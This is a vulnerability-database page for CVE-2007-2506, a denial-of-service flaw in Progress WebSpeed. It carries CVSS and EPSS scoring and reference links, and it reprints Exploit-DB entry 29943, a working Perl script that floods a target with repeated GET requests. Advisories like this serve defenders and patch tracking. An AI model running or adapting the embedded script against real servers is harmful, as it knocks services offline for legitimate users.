CVE-2007-2506 : Detail

CVE-2007-2506

6.2%V3
Network
2007-05-03
23h00 +00:00
2018-10-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

WebSpeed 3.x in OpenEdge 10.x in Progress Software Progress 9.1e, and certain other 9.x versions, allows remote attackers to cause a denial of service (infinite loop and daemon hang) via a messenger URL that invokes _edit.r with no additional parameters, as demonstrated by requests for cgiip.exe or wsisa.dll with WService=wsbroker1/_edit.r in the PATH_INFO.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.8 AV:N/AC:L/Au:N/C:N/I:N/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 29943

Publication date : 2007-05-01 22h00 +00:00
Author : Eelko Neven
EDB Verified : Yes

//source: https://www.securityfocus.com/bid/23778/info // //WebSpeed is prone to a denial-of-service vulnerability because it fails to properly sanitize user-supplied input. // //Successful exploits can allow attackers to cause the application to become unresponsive, denying service to legitimate users. if(!$ARGV[0]){ print "U.LP.O.W\n"; print "www.ulpow.net\n"; print "The Eliminators of the Web\n"; print "Usage:perl webspeed.pl targetsite targetpage\n"; } else { $site = $ARGV[0]; $page = $ARGV[1]; print "Attack Started\n"; $ish=1; do { $ish++; use IO::Socket; $socket = new IO::Socket::INET( PeerAddr => $site, PeerPort => 80, Proto => 'tcp', Type => SOCK_STREAM, ) or die "Couldn't Connect to target please check again address!\n"; print $socket "GET $page HTTP/1.0\r\n"; close($socket); } while ($ish < 1000); print ":-; Attack Complete\n"; }

Products Mentioned

Configuraton 0

Progress>>Progress >> Version 9.1e

    Progress>>Webspeed >> Version 3.0

    Progress>>Webspeed >> Version 3.1a

    Progress>>Webspeed >> Version 3.1d

    Progress>>Webspeed >> Version 3.1e

    References

    http://www.securityfocus.com/bid/23778
    Tags : vdb-entry, x_refsource_BID
    http://www.ishare.nl/
    Tags : x_refsource_MISC
    http://osvdb.org/35541
    Tags : vdb-entry, x_refsource_OSVDB
    http://secunia.com/advisories/25129
    Tags : third-party-advisory, x_refsource_SECUNIA